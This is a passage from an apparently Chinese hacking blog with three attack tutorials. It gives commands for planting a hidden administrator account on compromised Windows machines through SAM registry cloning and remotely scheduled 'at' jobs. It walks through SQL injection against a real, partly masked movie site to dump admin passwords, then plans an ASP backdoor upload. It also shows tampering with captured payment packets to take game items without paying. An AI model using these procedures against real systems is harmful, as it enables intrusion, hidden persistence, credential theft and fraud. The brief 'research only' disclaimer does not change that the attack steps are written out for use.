图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序,修改键值的权限时在右键中点"权限"来修改。对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINESAMSAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为"完全控制"权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:
1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户
net user hacker$ 1234 /add
2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。
3、点"权限"以后会弹出窗口
点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为"完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
4、再点"开始"→"运行"并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。
打开键:HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker$"
5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。
6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可
8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINESAMSAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用"net user"命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。

如何在命令行下远程建立隐藏的超级用户
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地址改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的ip地址。)
2、先与肉鸡建立连接,命令为: net use 13.50.97.238ipc$ "12345678" /user:"administrator
3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动):at 13.50.97.238 12:51
c:winntsystem32net.exe user hacker$ 1234 /add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。
4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值:at 13.50.97.238 12:55
c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
/e 是regedit.exe的参数,在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的一定要以结尾。必要的情况下可以用引号将"c:winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers"引起来。
5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy 13.50.97.238admin$system32hacker.reg
c:hacker.reg
修改的方法图形界中已经介绍过了,这里就不作介绍了。
6、再将编辑好的hacker.reg拷回肉鸡上 copy c:hacker.reg 13.50.97.238admin$system32hacker1.reg
7、查看肉鸡时间:net time 13.50.97.238 然后用at命令将用户hacker$删除:
at 13.50.97.238 13:40 net user hacker$ /del
8、验证hacker$是否删除:用
net use 13.50.97.238 /del 断开与肉鸡的连接。
net use 13.50.97.238ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接,不能连接说明已删除。
9、再与肉鸡建立连接:net use 13.50.97.238ipc$ "12345678" /user:"administrator"
再取得肉鸡时间,用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:
at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg
regedit.exe的参数/s是指安静模式。
10、再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
11、再验证用户hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。
12、通过11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删的权限。
三、如果肉鸡没有开3389终端服务,而我又不想用命令行,怎么办?
这种情况下,你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能,你可以用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。
但是这里有两个前提:1、先用net use 肉鸡ipipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后,才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。
2、远程主机必须开启远程注册表服务(没有开启的话,你也可以远程开启,因为你有超级用户的密码了)。
四、利用被禁用的帐户建立隐藏的超级用户:
我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:
1.想办法查看有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然了会禁用其它用户。在图形界面下,非常容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下,我还没有想到好的办法,只能在命令行下用命令:"net user 用户名"一个一个来查看用户是否被禁用。
2.在这里,我们假设用户hacker被管理员禁用。首先,我先用小榕的超组用户克隆程序CA.exe,将被禁用的用户hacker 克隆成超级用户(克隆之后,被禁用的用户hacker就会自动被激活了): CA.EXE 肉鸡ip Administrator 超级用户密码 hacher hacher密码。
3.如果你现在一个cmdshell,如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以,这时你只要输入命令:
net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样的),当然你也可以将用户hacher换成其它的被禁用的用户。
4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了,但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user 肉鸡ipipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家,经过我多次试验,次次都能成功,而且还是超级用户权限。
5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式:at 肉鸡ip 时间 net user hacker /active:no
6.原理:具体的高深的原理我也说不上来,我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会弹出一对话框,并禁止你继续禁用超级用户administrator,同样,因为在克隆时,hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代,因而hacker就具有了超级用户的权限了,但是由于hacker在注册表内"C"健还是原来的"C"键,所以hacker还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用户hacker还是可以连接肉鸡,而且还具有超级用户的权限。具体我也说不明白,大家权且这么理解吧。
五、注意的几点事项:
1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。
2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。
3、如在本机上试验时,最好用系统自带的备份工具先备份好本机的"系统状态"主要是注册表的备份,因为本人做试验时,曾出现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。
4、本方法在2000/XP上测试通过,未在NT上测试。本方法仅供研究,请勿将本方法用于破坏上,利用本方法造成严重后果者,由使用者负责,本人概不负责。

杂志录入:hackbase    责任编辑:hackbase 

lingsui521 发表于:2005.04.26 21:12 ::分类: ( 实用技术 ) ::阅读:(1243次) :: 评论 (1)
===========================================================
SQL注入的新技巧!
===========================================================
表名和字段名的获得
适用情况:
1)
数据库是MSSQL
2)连接
数据库的只是普通用户
3)不知道ASP源
代码

可以进行的攻击
1)对数据内容进行添加,查看,更改

实例:
本文件以

为列进行测试
攻击

第一步:
在输入用户名处输入单引号,显示
Microsoft OLE DB Provider for SQL Server 错误 80040e14
字符串 之前有未闭合的引号。

/user/wantpws.asp,行63

说明没有过滤单引号且
数据库是MSSQL.

第二步:
输入a;use master;--
显示
Microsoft OLE DB Provider for SQL Server 错误 80040e21 多步LE DB 操作产生错误。如果可能,请检查每个 OLE DB 状态值。没有工作被完成。

/user/wantpws.asp,行63
这样说明没有权限了。

第三步:
输入:a or name like fff%;--
显示有一个叫ffff的用户哈。

第四步:
在用户名处输入
ffff and 1<>(select count(email) from [user]);--
显示:
Microsoft OLE DB Provider for SQL Server 错误 80040e37
对象名 user 无效。

/user/wantpws.asp,行96

说明没有叫user的表,换成users试试成功,同时说明有一个叫email的列.
输入a having 1=1--
一般返回如下也就可以直接得到表名和一个字段名了
Microsoft OLE DB Provider for SQL Server 错误 80040e14
列 users.ID 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。

/user/wantpws.asp,行63

现在我们知道了ffff用户的
密码是111111.

下面通过语句得到
数据库中的所有表名和字段名。

第五步:
输入:
ffff;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
说明:
上面的语句是得到
数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad然后根据表名ad得到这个表的IDffff;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
同上可知id是:581577110由于对象标志id是根据由小到大排列的所以我们可以得到所有的用户表的名字了象下面这样就可以得到第二个表的名字了ffff;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--

ad 581577110
users 597577167
buy 613577224
car 629577281
learning 645577338
log 661577395
movie 677577452
movieurl 693577509
password 709577566
type 725577623
talk

经过一段时间的猜测后我们得到上面的分析一下应该明白password,users是最得要的

第六步:猜重要表的字段
输入:
现在就看看users表有哪些字段
ffff;update [users] set email=(select top 1 col
_name(object_id(users),3) from users) where name=ffff;--
得到第三个字段是password
ffff;update [users] set email=(select top 1 col
_name(object_id(users),4) from users) where name=ffff;--
得到第四个字段是name
最后users表的字段共28个全得到了
(注:另一个得到字段的办法,前提是系统的返回出错信息
a group by ID having 1=1--
得到
Microsoft OLE DB Provider for SQL Server 错误 80040e14
列 users.userid 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/user/wantpws.asp,行63
这个第二个字段就是userid
显示第三个字段。
a group by id,userid having 1=1--

Microsoft OLE DB Provider for SQL Server 错误 80040e14
列 users.password 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/user/wantpws.asp,行63
得到是password
同理,一直显示出所有。:)
)

users表
1 2 3 4
id userid password name

5 6 7 8 9 10 11 12 13 14 15 16
Province homeaddress city adress starlook sex email nlook nos date money send

17 18 19 20 21 22 23 24 25 26 27 28
oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag state post note

starlook--12 10 2003 2:41PM
nlook---0
nos---2 登陆次数
date--12 10 2003 12:00AM 注册时间?
money--同上
send--空
oklook--0
dnlook--0
getmoney--0
state--0
note--这家伙很。。。 说明

password表
1 2 3
id name pwd

然后我又试ad原来是用来记录广告击点的。。
然后又试password表得到有name和pwd字段。
执行
ffff;update [users] set email=(select top 1 name from password) where name=ffff;--
可得第一个用户名是admin123看样儿多半是管理员了。
然后又得到了
密码是dy***dick188还是打星号算了哈哈...

这样我们就完全进入了这个电影网站的后台了哈哈。
_blank>http://www.dy***.com/login.asp

再进一步还可以知道管理员一共有三人
密码也都能看到了。
ffff;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
ffff;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--

ffff;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--

只是能免费看电影好象还不够哈..我看了看它的后台管理原来在添加电影的地方对于上传的图片没有过滤.asa的文件,这样我就能上传一个asp后门并执行

lingsui521 发表于:2005.04.24 17:40 ::分类: ( 最新信息 ) ::阅读:(1781次) :: 评论 (1)
===========================================================
免费刷劲乐团的装备和点券
===========================================================
_content>免费刷劲乐团的装备和点券

首先进游戏随便购买一件东西.进入交费页面.   取得SESSION认证



切换回桌面.用浏览器访问



_step01.asp?gameid=" target=_blank>http://tradegzbp.9you.com:15000/payment/payment_step01.asp?gameid=用户ID



然后再用溯雪载入此页.按购买.然后CTRL+I分析表格.得到物品代码.物品代码属性名为



SUMPID.



启动WPE进行嗅探.马上切换回游戏购买物品.



购买完成回WPE查包.



内容.



POST /payment/payment_step03.asp HTTP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*..Referer:
_step02.asp..Accept-Language:" target=_blank>http://tradegzbp.9you.com:15000/payment/payment_step02.asp..Accept-Language: zh-cn..Content-Type: application/x-www-form-urlencoded..Accept-Encoding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)..Host: tradegzbp.9you.com:15000..Content-Length: 98..Connection: Keep-Alive..Cache-Control: no-cache..Cookie: bbscookie=8890517; 9youcookie=%2512%25E8%25AC%25EA0%25D0C; avatarcookie=6f377d52e99d4c1cc40788afea85f97c; newscookie=%25A5PcA%25ED%2502%2595%259B%25A4%25A5; mmcookie=%253C; ASPSESSIONIDCCRCCRQB=OOOJKAAACABKLDDNJIDCEADC....gameid=jamggg&SumPid=4747&SumgName=%B9%C2%B5%A5%CB%CC%D6%F7%CC%E2%CC%D7%D7%B0&chkCashType=GC&UserPwd=119&x=85&y=25.



从COOKIE=后数值不和上面相同.请注意.依自己抓的包而定.



修改后面这部分



gameid=jamggg&SumPid=4747&SumgName=%B9%C2%B5%A5%CB%CC%D6%F7%CC%E2%CC%D7%D7%B0&chkCashType=GC&UserPwd=119&x=85&y=25.



依次为游戏ID.物品代码.物品名.卡类.密码.请自己更改.



把SumPid=改成想买的未出售物品ID.SumgName改成想购买的物品名字(为汉字urlencode编码后的值)



后面还有一个包.需要使用.为发送状态.包的内容我没有保存.请自己去抓.内容为payment_step02.asp   验证通过.将此包保留下来.和上面的包各名为 包1 包2



.进入游戏.再次随便购买物品.进入到购买界面.开启一新网页浏览器.访问



_step01.asp?gameid=" target=_blank>http://tradegzbp.9you.com:15000/payment/payment_step01.asp?gameid=游戏帐号



有错误提示不要按确定.



然后到WPE内发送包1.发送包2.



然后直接访问



_step04.asp?gameid=" target=_blank>http://tradegzbp.9you.com:15000/payment/payment_step04.asp?gameid=游戏帐号



提示成功购买.下线重上.PASS了.



关于物品ID及名字.



请找一位在韩服玩的朋友.问一下物品名字.及按上面方法取得的物品ID.



----------------



其他.需要M币的装备.



.去弄个密码和你主帐号一样的用户名.里面要有M币.



先购买次普通物品取得COOKIES.



然后按COOKIES位置(封包内写了)把有M币的ID除了用户名外的COOKIES数据全部替换到现在使用的ID的COOKIES上.(浏览器打开的情况下).然后按上面的方法做就可以了.


lingsui521 发表于:2005.04.24 17:37 ::分类: ( 最新信息 ) ::阅读:(15549次) :: 评论 (1)
===========================================================
庆祝一下!!
===========================================================
今天BLOG逆向链接突破1000个,呵呵 ,心里特别高兴,感谢大家对我的支持,我会继续努力的,呵呵~~谢谢大家~~~~
lingsui521 发表于:2005.04.24 02:27 ::分类: ( 最新信息 ) ::阅读:(867次) :: 评论 (1)
自我介绍
切换风格
新闻聚合
博客日历
文章归档...
最新发表...
博客统计...
Blog信息
网站链接...